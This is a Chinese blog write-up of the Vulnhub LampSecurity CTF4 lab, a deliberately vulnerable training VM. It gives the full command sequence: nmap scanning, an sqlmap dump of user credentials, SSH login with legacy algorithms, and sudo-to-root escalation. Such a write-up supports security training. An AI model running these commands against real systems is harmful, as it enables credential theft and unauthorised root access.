前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhub靶机实操笔记-LampSecurity-CTF4

Vulnhub靶机实操笔记-LampSecurity-CTF4

原创
作者头像
沈少
修改2023-07-02 11:15:42
2050
修改2023-07-02 11:15:42
举报
文章被收录于专栏:靶机实操笔记靶机实操笔记

摘要

Vulnhub靶机实操笔记-LampSecurity-CTF4

涉及知识内容:SQL注入,SSH连接类型,Sudo内网提权

一、Namp扫描

1、主机存活判断

代码语言:javascript
复制
sudo nmap -sn 192.168.32.0./24

2、快速扫描

以不低于1w的速度快速扫描端口

代码语言:javascript
复制
 sudo nmap --min-rate 10000 -p- 192.168.32.141
 
 --min-rate #以不低于xxx的速度扫描
 -p- #全端口

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

代码语言:javascript
复制
 sudo nmap -sT -sV -O -p22,80,25,631 172.16.200.130
 
 -sT #以TCP协议进行扫描
 -sV #服务的版本号
 -O #服务器系统
 -p #指定端口

4、UDP扫描

代码语言:javascript
复制
sudo nmap -sU -p22,25,80,631 192.168.32.141

5、Namp的POC扫描

通过脚本扫描提示有SQL注入漏洞

代码语言:javascript
复制
sudo nmap --script=vuln -p22,25,80,631 192.168.32.141

二、SQL注入

复制脚本提示的URL访问查看

http://192.168.32.141:80/?title=Blog&id=2%27%20OR%20sqlspider&page=blog

通过输入单引号发现疑似存在SQL注入漏洞

使用sqlmap成功发现注入点

通过数据库获得6个用户名和密码

代码语言:javascript
复制
sudo sqlmap -u 'http://192.168.32.141/?title=Blog&id=2%20&page=blog' -p id --dbms mysql --batch -D ehks -T user -C user_name,user_pass --dump

三、SSH登陆的小状况

有账户名和密码直接尝试ssh登陆系统,这边发现登陆ssh的时候出现一点点的意外状况。不同ssh的应用版本和其配置的协议多少存在一些差别,配置文件的写法会有一些差别。

提示没有key exchange,这边要使用KexAlgorithms再接上我们缺少的

代码语言:javascript
复制
sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.32.141

再次执行提示我们key的类型没有找到,此时使用HostKeyAlgorithms指定具体的算法,经过ssh的小插曲配置调整后,发现第一个账户密码竟成功登陆

代码语言:javascript
复制
sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.32.141

四、内网提权

1、系统详情

代码语言:javascript
复制
uname -a #显示系统名、节点名称、操作系统的发行版号、内核版本等等

2、查看当前系统权限

代码语言:javascript
复制
 sudo -l #查看用户权限
 sudo /bin/bash #新启动一个新的bash线程命令

3、查看定时任务

代码语言:javascript
复制
 cat /etc/crontab #较为常用
 cat /etc/cron.d #比较少用

五、靶场下载链接

https://download.vulnhub.com/lampsecurity/ctf4.zip

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 摘要
  • 一、Namp扫描
    • 1、主机存活判断
      • 2、快速扫描
        • 3、TCP扫描
          • 4、UDP扫描
            • 5、Namp的POC扫描
            • 二、SQL注入
            • 三、SSH登陆的小状况
            • 四、内网提权
              • 1、系统详情
                • 2、查看当前系统权限
                  • 3、查看定时任务
                  • 五、靶场下载链接
                  相关产品与服务
                  安全攻防对抗服务
                  安全攻防对抗服务(Cybersecurity Attack-Defense Confrontation)基于腾讯安全专家能力及多年的攻防对抗经验构建。面向对安全能力有较高要求的企业用户,在用户授权后,通过实战模拟 APT 攻击的手法,对企业信息化资产以及可能产生危害的安全风险进行测试。通过多维度、多视角的安全攻防对抗,动态检测企业安全防护的整体水位。
                  领券
                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档